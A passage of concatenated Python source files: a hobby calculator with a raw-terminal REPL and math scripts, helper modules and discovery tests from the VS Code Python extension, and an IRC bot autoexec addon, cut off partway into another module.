tty.setraw(sys.stdin)
input = ""
index = 0
sys.stdout.write("\n")
sys.stdout.write(u"\u001b[1000D")
sys.stdout.write(u"\u001b[0K")
do_print = True
while True:
if do_print:
sys.stdout.write(">>> ")
do_print = False
sys.stdout.flush()
char = sys.stdin.read(1)
if char == ":":
sys.stdout.write("\n")
sys.stdout.write(u"\u001b[1000D")
sys.stdout.write(u"\u001b[0K")
return ""
if 32 <= ord(char) <= 126:
input += char
if ord(char) == 127:
input = input[:index-1]
if ord(char) in {10, 13}:
sys.stdout.write("\n")
sys.stdout.write(u"\u001b[1000D")
sys.stdout.write(u"\u001b[0K")
sys.stdout.flush()
with open("/tmp/.mlangrepl.temp", "w+") as f:
f.write(input)
os.system("mathlang /tmp/.mlangrepl.temp")
input = ""
sys.stdout.write("\n")
sys.stdout.write(u"\u001b[1000D")
sys.stdout.write(u"\u001b[0K")
sys.stdout.flush()
do_print = True
continue
sys.stdout.write(u"\u001b[1000D")
sys.stdout.write(u"\u001b[4C")
sys.stdout.write(u"\u001b[0K")
sys.stdout.write(syntax_highlight(input, keywords))
if index > 0:
sys.stdout.write(u"\u001b[" + str(index) + "C")
sys.stdout.flush()
return input
command_line({"sqrt": "\u001b[38;5;198m",
"log": "\u001b[38;5;198m",
"say": "\u001b[38;5;198m",
"sin": "\u001b[38;5;198m",
"cos": "\u001b[38;5;198m",
"tan": "\u001b[38;5;198m",
"cbrt": "\u001b[38;5;198m",
"asin": "\u001b[38;5;198m",
"acos": "\u001b[38;5;198m",
"atan": "\u001b[38;5;198m",
"\d+": "\u001b[38;2;214;119;119m",
"\+": "\u001b[38;2;112;112;112m",
"-": "\u001b[38;2;112;112;112m",
"\*\*?": "\u001b[38;2;112;112;112m",
"/": "\u001b[38;2;112;112;112m",
"%": "\u001b[38;2;112;112;112m",
"\".*\"": "\u001b[38;2;26;166;228m",
})
```
|
{
"source": "JesterOrNot/python_calc",
"score": 4
}
|
#### File: algeb/graph/main.py
```python
print('Welcome to the graphing calculator. The only options so far are graphing quadratic models (qe) and exponential functions (ef).')
userInt = input("What do you want to graph?: ")
def choose():
if userInt in 'qe':
import algeb.graph.graphQuadMod
elif userInt in 'ef':
import algeb.graph.graphExpFunc
else:
print("Error, Please try again this error may be due to mispelling on your part")
choose()
choose()
```
#### File: python_calc/algeb/linEquSolv.py
```python
def les():
def slope():
y1 = float(input('What is y1?: '))
y2 = float(input('What is y2?: '))
x1 = float(input('What is x1?: '))
x2 = float(input('What is x2?: '))
slope = (y2 - y1)/(x2 - x1)
b = ((slope * x1)*-1) + y1
print('y = {}x + {}'.format(slope, b))
slope()
try:
les()
except ZeroDivisionError:
print("You can't divide by zero silly!")
# The method I used for finding the equation for b was via rearranging
# y = mx + b
# -b -b
# y - b = mx
# -y -y
# -b = mx - y
# (-b)*-1 = (mx -y)*-1
# b = -mx + y
```
#### File: python_calc/algeb/median.py
```python
def median3():
numbers1 = input("What numbers are we finding the median of?: ")
numbers1 = numbers1.split(",")
num = []
for i in numbers1:
i = float(i)
num.append(i)
num.sort()
z = len(num)
if z % 2 == 0:
median1 = num[z//2]
median2 = num[z//2-1]
median = (median1 + median2)/2
else:
median = num[z//2]
median = float(median)
print(f"The Median is: {median}")
median3()
```
#### File: python_calc/algeb/quad.py
```python
from math import sqrt
def quad():
a = float(input('What is a?: '))
b = float(input('What is b?: '))
c = float(input('What is c?: '))
xplus = ( (b * -1) + (sqrt( (b ** 2) - (4* a * c) )) ) / (2 * a)
xminus = ( (b * -1) - (sqrt( (b ** 2) - (4* a * c) )) ) / (2 * a)
print('x = {} or x = {}'.format(xplus, xminus))
try:
quad()
except ValueError:
print("Error: Tip, you can't take the square root of a negative number; see if that is the issue!")
```
#### File: geom/area/AOCircle.py
```python
from math import pi
def aoc():
r = float(input("What is the radius?: "))
a = pi * (r ** 2)
print("A = {}".format(a))
```
#### File: python_calc/geom/main.py
```python
import os
print("Welcome to the geometry calculator avaliable calculators include: area finder (af), pythagTheo(pt), sin cos tan finder(sct), trigonometric table(tt)")
while True:
def chooseCalc():
userInt = input("What do you want to use?: ").lower()
if userInt == "af":
os.chdir('Area')
os.system('python3 ./main.py')
elif userInt == 'pt':
import thagTheo
elif userInt == 'sct':
import geom.SinCosTan
elif userInt == 'tt':
import geom.trigTabl
elif userInt == 'exit':
exit()
chooseCalc()
chooseCalc()
```
#### File: python_calc/geom/SinCosTan.py
```python
def sin():
o = float(input('What is the opposite?: '))
h = float(input("What is the hypotenuse?: "))
s = o / h
print("sin = {}".format(s))
def cos():
a = float(input('What is the adjacent?: '))
h = float(input("What is the hypotenuse?: "))
c = a / h
print('cos = {}'.format(c))
def tan():
o = float(input("What is the oppisite?: "))
a = float(input("What is the ajacent?: "))
t = o / a
print("tan = {}".format(t))
def main():
userInt = input('What are we solving for (sin cos or tan)?: ').lower()
if userInt == 'sin':
sin()
elif userInt == 'cos':
cos()
elif userInt == 'tan':
tan()
else:
print('An error has occurred, please try again')
main()
```
#### File: python_calc/phys/accelerate.py
```python
def acceleration():
initial_velocity = float(input("What is the initial velocity?: "))
final_velocity = float(input("What is the final velocity?: "))
starting_time = float(input("What is the starting time?: "))
ending_time = float(input("What is the ending time?: "))
delta_t = ending_time - starting_time
delta_v = final_velocity - initial_velocity
acceleration = delta_v/delta_t
print(f"acceleration = {acceleration} m/s")
acceleration()
```
#### File: python_calc/phys/distspeed.py
```python
while True:
def DSTFC():
keywordsDist = ['d', 'dis', 'dist', 'distance']
keywordsTime = ['t', 'tim', 'time', 'ti']
keywordsSpeed = ['s', 'sp', 'spe', 'spee', 'speed']
print("Welcome to the distance speed time calculator")
solveFor = input("What are we solvig for? (distance(d), speed(s) or time(t): ").lower()
if solveFor in keywordsDist:
s = float(input("What is speed in meters/seconds?: "))
t = float(input("What is the amount of time in seconds?: "))
dist = s * t
print("{} meters".format(dist))
elif solveFor in keywordsTime:
d = float(input("What is the distance in meters?: "))
s = float(input("What is the speed in meters/seconds"))
time = d / s
print("{} seconds".format(time))
elif solveFor in keywordsSpeed:
d = float(input("What is the distance in meters?: "))
t = float(input("What is the time in seconds"))
speed = d / t
print("{} m/s".format(speed))
DSTFC()
DSTFC()
```
|
{
"source": "JesterOrNot/vscode-python",
"score": 3
}
|
#### File: datascience/daemon/daemon_output.py
```python
import os
import sys
import logging
from threading import Lock
log = logging.getLogger(__name__)
class IORedirector:
"""
This class works to wrap a stream (stdout/stderr) with an additional redirect.
"""
def __init__(self, name, original, new_redirect, wrap_buffer=False):
"""
:param stream original:
The stream to be wrapped (usually stdout/stderr, but could be None).
:param stream new_redirect:
:param bool wrap_buffer:
            Whether to create a buffer attribute (needed to mimic Python 3
            stdout/stderr, which has a buffer to write binary data).
"""
self._name = name
self._lock = Lock()
self._writing = False
self._redirect_to = (new_redirect,)
if wrap_buffer and hasattr(original, "buffer"):
self.buffer = IORedirector(
name, original.buffer, new_redirect.buffer, False
)
def write(self, s):
# Note that writing to the original stream may fail for some reasons
# (such as trying to write something that's not a string or having it closed).
with self._lock:
if self._writing:
return
self._writing = True
try:
for r in self._redirect_to:
if hasattr(r, "write"):
r.write(s)
finally:
self._writing = False
def isatty(self):
for r in self._redirect_to:
if hasattr(r, "isatty"):
return r.isatty()
return False
def flush(self):
for r in self._redirect_to:
if hasattr(r, "flush"):
r.flush()
def __getattr__(self, name):
log.info("getting attr for %s: %s", self._name, name)
for r in self._redirect_to:
if hasattr(r, name):
return getattr(r, name)
raise AttributeError(name)
class CustomWriter(object):
def __init__(self, name, wrap_stream, wrap_buffer, on_write=None):
"""
:param wrap_stream:
Either sys.stdout or sys.stderr.
:param bool wrap_buffer:
If True the buffer attribute (which wraps writing bytes) should be
wrapped.
:param callable(str) on_write:
Call back with the string that has been written.
"""
self._name = name
encoding = getattr(wrap_stream, "encoding", None)
if not encoding:
encoding = os.environ.get("PYTHONIOENCODING", "utf-8")
self.encoding = encoding
if wrap_buffer:
self.buffer = CustomWriter(
name, wrap_stream, wrap_buffer=False, on_write=on_write
)
self._on_write = on_write
def flush(self):
pass # no-op here
def write(self, s):
if s:
# Need s in str
if isinstance(s, bytes):
s = s.decode(self.encoding, errors="replace")
log.info("write to %s: %s", self._name, s)
if self._on_write is not None:
self._on_write(s)
_stdin = sys.stdin.buffer
_stdout = sys.stdout.buffer
def get_io_buffers():
return _stdin, _stdout
def redirect_output(stdout_handler, stderr_handler):
log.info("Redirect stdout/stderr")
sys._vsc_out_buffer_ = CustomWriter("stdout", sys.stdout, True, stdout_handler)
sys.stdout_original = sys.stdout
_stdout_redirector = sys.stdout = IORedirector(
"stdout", sys.stdout, sys._vsc_out_buffer_, True
)
sys._vsc_err_buffer_ = CustomWriter("stderr", sys.stderr, True, stderr_handler)
sys.stderr_original = sys.stderr
_stderr_redirector = sys.stderr = IORedirector(
"stderr", sys.stderr, sys._vsc_err_buffer_, True
)
```
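For illustration, a minimal sketch of how `redirect_output` might be used; the handler names are hypothetical, and it assumes the definitions above are importable as `daemon_output`. Note that the wrapper forwards writes only to the handlers, while the original streams remain available as `sys.stdout_original` and `sys.stderr_original`.
```python
import sys
from daemon_output import redirect_output  # hypothetical import path
captured = []
def on_stdout(text):
    captured.append(("stdout", text))
def on_stderr(text):
    captured.append(("stderr", text))
redirect_output(on_stdout, on_stderr)
print("hello")                       # routed to on_stdout through the wrapper
sys.stderr.write("something bad\n")  # routed to on_stderr through the wrapper
print(captured, file=sys.stdout_original)  # the original stream is still reachable
```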
#### File: vscode-python/pythonFiles/symbolProvider.py
```python
import ast
import json
import sys
class Visitor(ast.NodeVisitor):
def __init__(self):
self.symbols = {"classes": [], "methods": [], "functions": []}
def visit_Module(self, node):
self.visitChildren(node)
def visitChildren(self, node, namespace=""):
for child in node.body:
if isinstance(child, ast.FunctionDef):
self.visitDef(child, namespace)
if isinstance(child, ast.ClassDef):
self.visitClassDef(child, namespace)
try:
if isinstance(child, ast.AsyncFunctionDef):
self.visitDef(child, namespace)
except Exception:
pass
def visitDef(self, node, namespace=""):
end_position = self.getEndPosition(node)
symbol = "functions" if namespace == "" else "methods"
self.symbols[symbol].append(self.getDataObject(node, namespace))
def visitClassDef(self, node, namespace=""):
end_position = self.getEndPosition(node)
self.symbols['classes'].append(self.getDataObject(node, namespace))
if len(namespace) > 0:
namespace = "{0}::{1}".format(namespace, node.name)
else:
namespace = node.name
self.visitChildren(node, namespace)
def getDataObject(self, node, namespace=""):
end_position = self.getEndPosition(node)
return {
"namespace": namespace,
"name": node.name,
"range": {
"start": {
"line": node.lineno - 1,
"character": node.col_offset
},
"end": {
"line": end_position[0],
"character": end_position[1]
}
}
}
def getEndPosition(self, node):
if not hasattr(node, 'body') or len(node.body) == 0:
return (node.lineno - 1, node.col_offset)
return self.getEndPosition(node.body[-1])
def provide_symbols(source):
"""Provides a list of all symbols in provided code.
The list comprises of 3-item tuples that contain the starting line number,
ending line number and whether the statement is a single line.
"""
tree = ast.parse(source)
visitor = Visitor()
visitor.visit(tree)
sys.stdout.write(json.dumps(visitor.symbols))
sys.stdout.flush()
if __name__ == "__main__":
if len(sys.argv) == 3:
contents = sys.argv[2]
else:
with open(sys.argv[1], "r") as source:
contents = source.read()
try:
default_encoding = sys.getdefaultencoding()
encoded_contents = contents.encode(default_encoding, 'surrogateescape')
contents = encoded_contents.decode(default_encoding, 'replace')
except (UnicodeError, LookupError):
pass
if isinstance(contents, bytes):
contents = contents.decode('utf8')
provide_symbols(contents)
```
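A small usage sketch, assuming the module above is importable as `symbolProvider`; it prints the JSON symbol description for a tiny source snippet.
```python
from symbolProvider import provide_symbols  # hypothetical import path
sample = (
    "class Greeter:\n"
    "    def greet(self):\n"
    "        return 'hi'\n"
    "def main():\n"
    "    pass\n"
)
# Writes {"classes": [...], "methods": [...], "functions": [...]} to stdout,
# with a name, namespace and source range for each symbol.
provide_symbols(sample)
```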
#### File: testing_tools/adapter/errors.py
```python
class UnsupportedToolError(ValueError):
def __init__(self, tool):
msg = 'unsupported tool {!r}'.format(tool)
super(UnsupportedToolError, self).__init__(msg)
self.tool = tool
class UnsupportedCommandError(ValueError):
def __init__(self, cmd):
msg = 'unsupported cmd {!r}'.format(cmd)
super(UnsupportedCommandError, self).__init__(msg)
self.cmd = cmd
```
#### File: adapter/pytest/_cli.py
```python
from __future__ import absolute_import
from ..errors import UnsupportedCommandError
def add_subparser(cmd, name, parent):
"""Add a new subparser to the given parent and add args to it."""
parser = parent.add_parser(name)
if cmd == 'discover':
# For now we don't have any tool-specific CLI options to add.
pass
else:
raise UnsupportedCommandError(cmd)
return parser
```
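A sketch of how `add_subparser` plugs into a standard `argparse` setup; the parser layout and the extra option are illustrative, and it assumes the function above is importable.
```python
import argparse
from _cli import add_subparser  # hypothetical import path
parser = argparse.ArgumentParser(prog="adapter")
subcommands = parser.add_subparsers(dest="cmd")
# 'discover' is the only adapter command this hook supports; anything else
# raises UnsupportedCommandError.
pytest_parser = add_subparser("discover", "pytest", subcommands)
pytest_parser.add_argument("--rootdir", help="illustrative extra option")
args = parser.parse_args(["pytest", "--rootdir", "."])
print(args.cmd, args.rootdir)  # pytest .
```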
#### File: testing_tools/adapter/test_discovery.py
```python
from __future__ import absolute_import, print_function
import unittest
from testing_tools.adapter.util import fix_path, fix_relpath
from testing_tools.adapter.info import TestInfo, TestPath, ParentInfo
from testing_tools.adapter.discovery import fix_nodeid, DiscoveredTests
def _fix_nodeid(nodeid):
nodeid = nodeid.replace('\\', '/')
if not nodeid.startswith('./'):
nodeid = './' + nodeid
return nodeid
class DiscoveredTestsTests(unittest.TestCase):
def test_list(self):
testroot = fix_path('/a/b/c')
relfile = fix_path('./test_spam.py')
tests = [
TestInfo(
# missing "./":
id='test_spam.py::test_each[10-10]',
name='test_each[10-10]',
path=TestPath(
root=testroot,
relfile=relfile,
func='test_each',
sub=['[10-10]'],
),
source='{}:{}'.format(relfile, 10),
markers=None,
# missing "./":
parentid='test_spam.py::test_each',
),
TestInfo(
id='test_spam.py::All::BasicTests::test_first',
name='test_first',
path=TestPath(
root=testroot,
relfile=relfile,
func='All.BasicTests.test_first',
sub=None,
),
source='{}:{}'.format(relfile, 62),
markers=None,
parentid='test_spam.py::All::BasicTests',
),
]
allparents= [
[(fix_path('./test_spam.py::test_each'), 'test_each', 'function'),
(fix_path('./test_spam.py'), 'test_spam.py', 'file'),
('.', testroot, 'folder'),
],
[(fix_path('./test_spam.py::All::BasicTests'), 'BasicTests', 'suite'),
(fix_path('./test_spam.py::All'), 'All', 'suite'),
(fix_path('./test_spam.py'), 'test_spam.py', 'file'),
('.', testroot, 'folder'),
],
]
expected = [test._replace(id=_fix_nodeid(test.id),
parentid=_fix_nodeid(test.parentid))
for test in tests]
discovered = DiscoveredTests()
for test, parents in zip(tests, allparents):
discovered.add_test(test, parents)
size = len(discovered)
items = [discovered[0], discovered[1]]
snapshot = list(discovered)
self.maxDiff = None
self.assertEqual(size, 2)
self.assertEqual(items, expected)
self.assertEqual(snapshot, expected)
def test_reset(self):
testroot = fix_path('/a/b/c')
discovered = DiscoveredTests()
discovered.add_test(
TestInfo(
id='./test_spam.py::test_each',
name='test_each',
path=TestPath(
root=testroot,
relfile='test_spam.py',
func='test_each',
),
source='test_spam.py:11',
markers=[],
parentid='./test_spam.py',
),
[('./test_spam.py', 'test_spam.py', 'file'),
('.', testroot, 'folder'),
])
before = len(discovered), len(discovered.parents)
discovered.reset()
after = len(discovered), len(discovered.parents)
self.assertEqual(before, (1, 2))
self.assertEqual(after, (0, 0))
def test_parents(self):
testroot = fix_path('/a/b/c')
relfile = fix_path('x/y/z/test_spam.py')
tests = [
TestInfo(
# missing "./", using pathsep:
id=relfile + '::test_each[10-10]',
name='test_each[10-10]',
path=TestPath(
root=testroot,
relfile=fix_relpath(relfile),
func='test_each',
sub=['[10-10]'],
),
source='{}:{}'.format(relfile, 10),
markers=None,
# missing "./", using pathsep:
parentid=relfile + '::test_each',
),
TestInfo(
# missing "./", using pathsep:
id=relfile + '::All::BasicTests::test_first',
name='test_first',
path=TestPath(
root=testroot,
relfile=fix_relpath(relfile),
func='All.BasicTests.test_first',
sub=None,
),
source='{}:{}'.format(relfile, 61),
markers=None,
# missing "./", using pathsep:
parentid=relfile + '::All::BasicTests',
),
]
allparents= [
# missing "./", using pathsep:
[(relfile + '::test_each', 'test_each', 'function'),
(relfile, relfile, 'file'),
('.', testroot, 'folder'),
],
# missing "./", using pathsep:
[(relfile + '::All::BasicTests', 'BasicTests', 'suite'),
(relfile + '::All', 'All', 'suite'),
(relfile, 'test_spam.py', 'file'),
(fix_path('x/y/z'), 'z', 'folder'),
(fix_path('x/y'), 'y', 'folder'),
(fix_path('./x'), 'x', 'folder'),
('.', testroot, 'folder'),
],
]
discovered = DiscoveredTests()
for test, parents in zip(tests, allparents):
discovered.add_test(test, parents)
parents = discovered.parents
self.maxDiff = None
self.assertEqual(parents, [
ParentInfo(
id='.',
kind='folder',
name=testroot,
),
ParentInfo(
id='./x',
kind='folder',
name='x',
root=testroot,
relpath=fix_path('./x'),
parentid='.',
),
ParentInfo(
id='./x/y',
kind='folder',
name='y',
root=testroot,
relpath=fix_path('./x/y'),
parentid='./x',
),
ParentInfo(
id='./x/y/z',
kind='folder',
name='z',
root=testroot,
relpath=fix_path('./x/y/z'),
parentid='./x/y',
),
ParentInfo(
id='./x/y/z/test_spam.py',
kind='file',
name='test_spam.py',
root=testroot,
relpath=fix_relpath(relfile),
parentid='./x/y/z',
),
ParentInfo(
id='./x/y/z/test_spam.py::All',
kind='suite',
name='All',
root=testroot,
parentid='./x/y/z/test_spam.py',
),
ParentInfo(
id='./x/y/z/test_spam.py::All::BasicTests',
kind='suite',
name='BasicTests',
root=testroot,
parentid='./x/y/z/test_spam.py::All',
),
ParentInfo(
id='./x/y/z/test_spam.py::test_each',
kind='function',
name='test_each',
root=testroot,
parentid='./x/y/z/test_spam.py',
),
])
def test_add_test_simple(self):
testroot = fix_path('/a/b/c')
relfile = 'test_spam.py'
test = TestInfo(
# missing "./":
id=relfile + '::test_spam',
name='test_spam',
path=TestPath(
root=testroot,
# missing "./":
relfile=relfile,
func='test_spam',
),
# missing "./":
source='{}:{}'.format(relfile, 11),
markers=[],
# missing "./":
parentid=relfile,
)
expected = test._replace(id=_fix_nodeid(test.id),
parentid=_fix_nodeid(test.parentid))
discovered = DiscoveredTests()
before = list(discovered), discovered.parents
discovered.add_test(test, [
(relfile, relfile, 'file'),
('.', testroot, 'folder'),
])
after = list(discovered), discovered.parents
self.maxDiff = None
self.assertEqual(before, ([], []))
self.assertEqual(after, ([expected], [
ParentInfo(
id='.',
kind='folder',
name=testroot,
),
ParentInfo(
id='./test_spam.py',
kind='file',
name=relfile,
root=testroot,
relpath=relfile,
parentid='.',
),
]))
def test_multiroot(self):
# the first root
testroot1 = fix_path('/a/b/c')
relfile1 = 'test_spam.py'
alltests = [
TestInfo(
# missing "./":
id=relfile1 + '::test_spam',
name='test_spam',
path=TestPath(
root=testroot1,
relfile=fix_relpath(relfile1),
func='test_spam',
),
source='{}:{}'.format(relfile1, 10),
markers=[],
# missing "./":
parentid=relfile1,
),
]
allparents = [
# missing "./":
[(relfile1, 'test_spam.py', 'file'),
('.', testroot1, 'folder'),
],
]
# the second root
testroot2 = fix_path('/x/y/z')
relfile2 = fix_path('w/test_eggs.py')
alltests.extend([
TestInfo(
id=relfile2 + '::BasicTests::test_first',
name='test_first',
path=TestPath(
root=testroot2,
relfile=fix_relpath(relfile2),
func='BasicTests.test_first',
),
source='{}:{}'.format(relfile2, 61),
markers=[],
parentid=relfile2 + '::BasicTests',
),
])
allparents.extend([
# missing "./", using pathsep:
[(relfile2 + '::BasicTests', 'BasicTests', 'suite'),
(relfile2, 'test_eggs.py', 'file'),
(fix_path('./w'), 'w', 'folder'),
('.', testroot2, 'folder'),
],
])
discovered = DiscoveredTests()
for test, parents in zip(alltests, allparents):
discovered.add_test(test, parents)
tests = list(discovered)
parents = discovered.parents
self.maxDiff = None
self.assertEqual(tests, [
# the first root
TestInfo(
id='./test_spam.py::test_spam',
name='test_spam',
path=TestPath(
root=testroot1,
relfile=fix_relpath(relfile1),
func='test_spam',
),
source='{}:{}'.format(relfile1, 10),
markers=[],
parentid='./test_spam.py',
),
            # the second root
TestInfo(
id='./w/test_eggs.py::BasicTests::test_first',
name='test_first',
path=TestPath(
root=testroot2,
relfile=fix_relpath(relfile2),
func='BasicTests.test_first',
),
source='{}:{}'.format(relfile2, 61),
markers=[],
parentid='./w/test_eggs.py::BasicTests',
),
])
self.assertEqual(parents, [
# the first root
ParentInfo(
id='.',
kind='folder',
name=testroot1,
),
ParentInfo(
id='./test_spam.py',
kind='file',
name='test_spam.py',
root=testroot1,
relpath=fix_relpath(relfile1),
parentid='.',
),
            # the second root
ParentInfo(
id='.',
kind='folder',
name=testroot2,
),
ParentInfo(
id='./w',
kind='folder',
name='w',
root=testroot2,
relpath=fix_path('./w'),
parentid='.',
),
ParentInfo(
id='./w/test_eggs.py',
kind='file',
name='test_eggs.py',
root=testroot2,
relpath=fix_relpath(relfile2),
parentid='./w',
),
ParentInfo(
id='./w/test_eggs.py::BasicTests',
kind='suite',
name='BasicTests',
root=testroot2,
parentid='./w/test_eggs.py',
),
])
def test_doctest(self):
testroot = fix_path('/a/b/c')
doctestfile = fix_path('./x/test_doctest.txt')
relfile = fix_path('./x/y/z/test_eggs.py')
alltests = [
TestInfo(
id=doctestfile + '::test_doctest.txt',
name='test_doctest.txt',
path=TestPath(
root=testroot,
relfile=doctestfile,
func=None,
),
source='{}:{}'.format(doctestfile, 0),
markers=[],
parentid=doctestfile,
),
# With --doctest-modules
TestInfo(
id=relfile + '::test_eggs',
name='test_eggs',
path=TestPath(
root=testroot,
relfile=relfile,
func=None,
),
source='{}:{}'.format(relfile, 0),
markers=[],
parentid=relfile,
),
TestInfo(
id=relfile + '::test_eggs.TestSpam',
name='test_eggs.TestSpam',
path=TestPath(
root=testroot,
relfile=relfile,
func=None,
),
source='{}:{}'.format(relfile, 12),
markers=[],
parentid=relfile,
),
TestInfo(
id=relfile + '::test_eggs.TestSpam.TestEggs',
name='test_eggs.TestSpam.TestEggs',
path=TestPath(
root=testroot,
relfile=relfile,
func=None,
),
source='{}:{}'.format(relfile, 27),
markers=[],
parentid=relfile,
),
]
allparents = [
[(doctestfile, 'test_doctest.txt', 'file'),
(fix_path('./x'), 'x', 'folder'),
('.', testroot, 'folder'),
],
[(relfile, 'test_eggs.py', 'file'),
(fix_path('./x/y/z'), 'z', 'folder'),
(fix_path('./x/y'), 'y', 'folder'),
(fix_path('./x'), 'x', 'folder'),
('.', testroot, 'folder'),
],
[(relfile, 'test_eggs.py', 'file'),
(fix_path('./x/y/z'), 'z', 'folder'),
(fix_path('./x/y'), 'y', 'folder'),
(fix_path('./x'), 'x', 'folder'),
('.', testroot, 'folder'),
],
[(relfile, 'test_eggs.py', 'file'),
(fix_path('./x/y/z'), 'z', 'folder'),
(fix_path('./x/y'), 'y', 'folder'),
(fix_path('./x'), 'x', 'folder'),
('.', testroot, 'folder'),
],
]
expected = [test._replace(id=_fix_nodeid(test.id),
parentid=_fix_nodeid(test.parentid))
for test in alltests]
discovered = DiscoveredTests()
for test, parents in zip(alltests, allparents):
discovered.add_test(test, parents)
tests = list(discovered)
parents = discovered.parents
self.maxDiff = None
self.assertEqual(tests, expected)
self.assertEqual(parents, [
ParentInfo(
id='.',
kind='folder',
name=testroot,
),
ParentInfo(
id='./x',
kind='folder',
name='x',
root=testroot,
relpath=fix_path('./x'),
parentid='.',
),
ParentInfo(
id='./x/test_doctest.txt',
kind='file',
name='test_doctest.txt',
root=testroot,
relpath=fix_path(doctestfile),
parentid='./x',
),
ParentInfo(
id='./x/y',
kind='folder',
name='y',
root=testroot,
relpath=fix_path('./x/y'),
parentid='./x',
),
ParentInfo(
id='./x/y/z',
kind='folder',
name='z',
root=testroot,
relpath=fix_path('./x/y/z'),
parentid='./x/y',
),
ParentInfo(
id='./x/y/z/test_eggs.py',
kind='file',
name='test_eggs.py',
root=testroot,
relpath=fix_relpath(relfile),
parentid='./x/y/z',
),
])
def test_nested_suite_simple(self):
testroot = fix_path('/a/b/c')
relfile = fix_path('./test_eggs.py')
alltests = [
TestInfo(
id=relfile + '::TestOuter::TestInner::test_spam',
name='test_spam',
path=TestPath(
root=testroot,
relfile=relfile,
func='TestOuter.TestInner.test_spam',
),
source='{}:{}'.format(relfile, 10),
markers=None,
parentid=relfile + '::TestOuter::TestInner',
),
TestInfo(
id=relfile + '::TestOuter::TestInner::test_eggs',
name='test_eggs',
path=TestPath(
root=testroot,
relfile=relfile,
func='TestOuter.TestInner.test_eggs',
),
source='{}:{}'.format(relfile, 21),
markers=None,
parentid=relfile + '::TestOuter::TestInner',
),
]
allparents= [
[(relfile + '::TestOuter::TestInner', 'TestInner', 'suite'),
(relfile + '::TestOuter', 'TestOuter', 'suite'),
(relfile, 'test_eggs.py', 'file'),
('.', testroot, 'folder'),
],
[(relfile + '::TestOuter::TestInner', 'TestInner', 'suite'),
(relfile + '::TestOuter', 'TestOuter', 'suite'),
(relfile, 'test_eggs.py', 'file'),
('.', testroot, 'folder'),
],
]
expected = [test._replace(id=_fix_nodeid(test.id),
parentid=_fix_nodeid(test.parentid))
for test in alltests]
discovered = DiscoveredTests()
for test, parents in zip(alltests, allparents):
discovered.add_test(test, parents)
tests = list(discovered)
parents = discovered.parents
self.maxDiff = None
self.assertEqual(tests, expected)
self.assertEqual(parents, [
ParentInfo(
id='.',
kind='folder',
name=testroot,
),
ParentInfo(
id='./test_eggs.py',
kind='file',
name='test_eggs.py',
root=testroot,
relpath=fix_relpath(relfile),
parentid='.'
),
ParentInfo(
id='./test_eggs.py::TestOuter',
kind='suite',
name='TestOuter',
root=testroot,
parentid='./test_eggs.py',
),
ParentInfo(
id='./test_eggs.py::TestOuter::TestInner',
kind='suite',
name='TestInner',
root=testroot,
parentid='./test_eggs.py::TestOuter',
),
])
```
|
{
"source": "jesterpm/pyIRC",
"score": 2
}
|
#### File: jesterpm/pyIRC/autoexec.py
```python
import re
import irc
import fnmatch
def AutoexecReload(old_ax):
ax = Autoexec()
for (context, conf) in old_ax.networks.items():
context.rmAddon(old_ax)
context.addAddon(ax, **conf.__dict__)
return ax
class Autoexec(object):
def __init__(self):
self.networks = {}
self._rejoinchannels = {}
# Saved channels for when a connection is lost
def onAddonAdd(self, context, label, onconnect=[], onregister=[], autojoin=[], usermodes=None, nsautojoin=[], nsmatch=None, wallet=None, opername=None, opermodes=None, snomasks=None, operexec=None, operjoin=[], autorejoin=True):
labels = [v.label for v in self.networks.values()]
if label in labels:
raise BaseException, "Label already exists"
if context in self.networks.keys():
raise BaseException, "Network already exists"
self.networks[context] = irc.Config(
self, label=label, onconnect=list(onconnect), onregister=list(onregister), autojoin=irc.ChanList(autojoin, context=context),
usermodes=usermodes, nsautojoin=irc.ChanList(nsautojoin, context=context), nsmatch=nsmatch, wallet=wallet,
opername=opername, opermodes=opermodes, snomasks=snomasks, operexec=operexec, operjoin=irc.ChanList(operjoin, context=context), autorejoin=autorejoin)
self._rejoinchannels[context] = None
return self.networks[context]
def onDisconnect(self, context, expected):
conf = self.networks[context]
if conf.autorejoin and not expected and context.identity and context.identity.channels:
self._rejoinchannels[context] = irc.ChanList(
context.identity.channels, context=context) # Store a *copy* of the list of channels
def onQuit(self, context, user, quitmsg):
if user == context.identity and not context._quitexpected:
# Bot received a QUIT message for itself, and was not expected.
self.onDisconnect(context, False)
def onAddonRem(self, context):
del self.networks[context], self._rejoinchannels[context]
def onConnect(self, context):
conf = self.networks[context]
if conf.onconnect:
for line in conf.onconnect:
context.raw(line, origin=self)
def onRegistered(self, context):
conf = self.networks[context]
if conf.onregister:
for line in conf.onregister:
context.raw(line, origin=self)
if conf.usermodes:
context.raw("MODE %s %s" %
(context.identity.nick, conf.usermodes), origin=self)
if conf.opername and conf.wallet and "%s/opers/%s" % (conf.label, conf.opername) in conf.wallet.keys():
context.raw("OPER %s %s" %
(conf.opername, conf.wallet["%s/opers/%s" % (conf.label, conf.opername)]), origin=self)
if conf.autojoin:
conf.autojoin.join(origin=self)
if conf.autorejoin and self._rejoinchannels[context]:
rejoin = irc.ChanList([channel for channel in self._rejoinchannels[
context] if channel not in conf.autojoin + conf.nsautojoin + conf.operjoin], context=context)
if len(rejoin):
rejoin.join(origin=self)
self._rejoinchannels[context] = None
def on381(self, context, line, origin, target, params, extinfo):
conf = self.networks[context]
if conf.operexec:
for line in conf.operexec:
context.raw(line, origin=self)
if conf.opermodes:
context.raw("MODE %s %s" %
(context.identity.nick, conf.opermodes), origin=self)
if conf.snomasks:
context.raw("MODE %s +s %s" %
(context.identity.nick, conf.snomasks), origin=self)
if conf.operjoin:
conf.operjoin.join(origin=self)
def onPrivNotice(self, context, origin, msg):
conf = self.networks[context]
if type(origin) == irc.User and origin.nick.lower() == "nickserv":
if re.match("This nickname is registered( and protected)?", msg) and (not conf.nsmatch or fnmatch.fnmatch("%s!%s@%s" % (origin.nick, origin.username, origin.host), conf.nsmatch)) and conf.wallet and "%s/NickServ/%s" % (conf.label, context.identity.nick.lower()) in conf.wallet.keys():
origin.msg("identify %s" %
conf.wallet["%s/NickServ/%s" % (conf.label, context.identity.nick.lower())])
if re.match("You are now identified", msg):
if conf.nsautojoin:
conf.nsautojoin.join(origin=self)
def on900(self, context, line, origin, target, params, extinfo):
conf = self.networks[context]
if conf.nsautojoin:
conf.nsautojoin.join(origin=self)
```
#### File: jesterpm/pyIRC/modjson.py
```python
import json
import inspect
import re
import importlib
import collections
import new
from json.decoder import errmsg
